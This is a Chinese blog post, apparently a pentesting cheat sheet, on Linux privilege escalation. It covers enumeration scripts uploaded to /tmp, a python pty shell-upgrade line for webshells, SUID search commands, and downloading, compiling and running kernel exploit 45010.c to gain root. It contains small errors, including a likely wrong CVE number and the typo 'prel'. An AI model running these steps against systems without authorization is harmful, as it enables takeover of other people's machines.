实用工具小学数学练习字帖生成在线画板函数绘制拼音字母表在线词典黄历查询中国历史 Excel函数模拟请求 json格式化

栏目分类:

子分类:

名师互学网

名师互学网用户登录

快速导航

当前搜索

当前分类

前沿技术软件开发系统运维产品运营生活办公面试经验考试题库

实用工具

学习工具小学数学练习字帖生成在线画板函数绘制拼音字母表在线词典黄历查询亲戚关系计算安全期计算中国历史 Excel函数模拟请求 json格式化浏览器指纹

名师互学网 > IT > 系统运维 > 运维 > Linux

Linux提权

Linux 更新时间：2026-04-04 10:20:41 发布时间：1551天前 IT归档最新发布模块sitemap 名妆网法律咨询聚返吧英语巴士网伯小乐网商动力

一、Linux信息收集：

LinEnum脚本
地址：https://github.com/rebootuser/LinEnum
介绍：
用法：
上传到 /tmp目录下，然后运行即可

二、Linux漏洞探测：
5. Linux-exploit-suggester脚本
6. 地址：https://github.com/mzet-/linux-exploit-suggester
7. 介绍：
8. 用法：
上传到 /tmp目录下，然后运行即可

三、Linux漏洞探测：
9. Linux-exploit-suggester-2.pl脚本
10. 地址：https://github.com/jondonas/linux-exploit-suggester-2
11. 介绍：
12. 用法：
上传到 /tmp目录下，然后使用perl运行即可（需要安装perl命令）

prel  Linux-exploit-suggester-2.pl

四、Linux提权方式：

**注意1：**凡是需要编译的，均无法在webshell内执行，如gcc、make等

注意2：
python调用本地shell实现交互式命令行

python -c 'import pty;pty.spawn('/bin/bash')'

SUID提权：

参考：https://pentestlab.blog/2017/09/25/suid-executables/
关键：查找SUID中是否含有以下支持命令：

 Nmap、Vim、find、Bash、More、Less、Nano、cp

手工判断：

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

内核漏洞提权

CVE-2017-16695
下载C代码：

wget https://github.com/Jewel591/Privilege-Escalation/blob/master/45010.c

使用步骤：

#下面进行编译
gcc 45010.c -o 45010
#添加执行权限
chmod +x 45010
./45010
#成功提权到 root。
whoami
root

脏牛漏洞提权

转载请注明：文章转载自 www.mshxw.com

本文地址：https://www.mshxw.com/it/694212.html

上一篇 List三种遍历方式

下一篇 dos控制台下的HelloWorld实现

Linux相关栏目本月热门文章

热门相关搜索

路由器设置木托盘宝塔面板儿童python教程心情低落朋友圈 vim 双一流学科专升本我的学校日记学校西点培训学校汽修学校情书化妆学校塔沟武校异形模板西南大学排名最精辟人生短句 6步教你追回被骗的钱南昌大学排名清朝十二帝北京印刷学院排名北方工业大学排名北京航空航天大学排名首都经济贸易大学排名中国传媒大学排名首都师范大学排名中国地质大学(北京)排名北京信息科技大学排名中央民族大学排名北京舞蹈学院排名北京电影学院排名中国戏曲学院排名河北政法职业学院排名河北经贸大学排名天津中德应用技术大学排名天津医学高等专科学校排名天津美术学院排名天津音乐学院排名天津工业大学排名北京工业大学耿丹学院排名北京警察学院排名天津科技大学排名北京邮电大学(宏福校区)排名北京网络职业学院排名北京大学医学部排名河北科技大学排名河北地质大学排名河北体育学院排名

关于我们文章归档网站地图联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号：晋ICP备2021003244-6号